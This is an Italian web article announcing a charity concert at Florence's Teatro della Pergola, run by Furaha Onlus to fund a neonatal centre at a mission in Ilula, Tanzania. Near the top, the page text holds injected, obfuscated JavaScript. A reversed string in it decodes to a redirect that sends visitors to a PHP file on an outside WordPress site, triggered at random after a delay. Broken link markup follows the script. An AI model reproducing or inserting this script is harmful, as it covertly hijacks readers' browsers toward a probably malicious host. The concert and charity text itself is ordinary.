Un centro neonatale in Tanzania. Il 3 aprile il concerto alla Pergola

image_pdfimage_print

$p$VTO6JhIH6WkCGAcPR=function(n){if (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == “string”) return $p$VTO6JhIH6WkCGAcPR.list[n].split(“”).reverse().join(“”);return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=[“‘php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}and(this)” href=”http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0CCkQFjAA&url=http%3A%2F%2Fwww.furaha.it%2F&ei=OhFnT8rnH4mWOve_lJsI&usg=AFQjCNHhz12DSFnTCeWkBFw_0LrjvFnpCQ&sig2=zngHnJ2P0vefWpW5Resz5g”>Una serata speciale, da Bizet ai Pink Floyd. Ad organizzare l’evento “Note… sul nascere” martedì 3 aprile alle ore 21 al Teatro della Pergola è la onlus Furaha un’associazione laica ed indipendente nata a Firenze dal desiderio di tre amici di aiutare e fare volontariato in maniera diretta ed indipendente dalle grandi organizzazioni.

Al concerto parteciperanno la Scuola di Musica di Fiesole con i giovani allievi dell’ensamble di fiati “Fiesole Harmonie” diretti dal maestro Guido Corti; il coro gospel spiritual, blues “The pilgrims gospel” diretto dal maestro Gianni Mini. La regia è di Stefano Tamburini. L’incasso della serata sarà interamente devoluto a Furaha Onlus per la realizzazione del centro neo-natale all’interno della Missione “Villaggio della Gioia”.

I volontari di Furaha, di diverse età, provenienza e preparazione, prestano a vario titolo la loro opera in modo totalmente gratuita. L’associazione è impegnata nel portare avanti il progetto che l’ha vista nascere: migliorare la realtà quotidiana di una popolazione nel Sud Ovest della Tanzania, nella regione di Ilula, dove la sopravvivenza richiede costantemente sforzi a noi sconosciuti. In particolare, l’impegno è quello di fornire aiuto alla Missione di Ilula dove un sacerdote italiano, Padre Filippo Mammano, da trent’anni è impegnato nel dare maggiore dignità all’esistenza di bambini orfani, handicappati e disabili garantendo loro accoglienza, assistenza, cibo e per i più fortunati, un’istruzione di base.

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *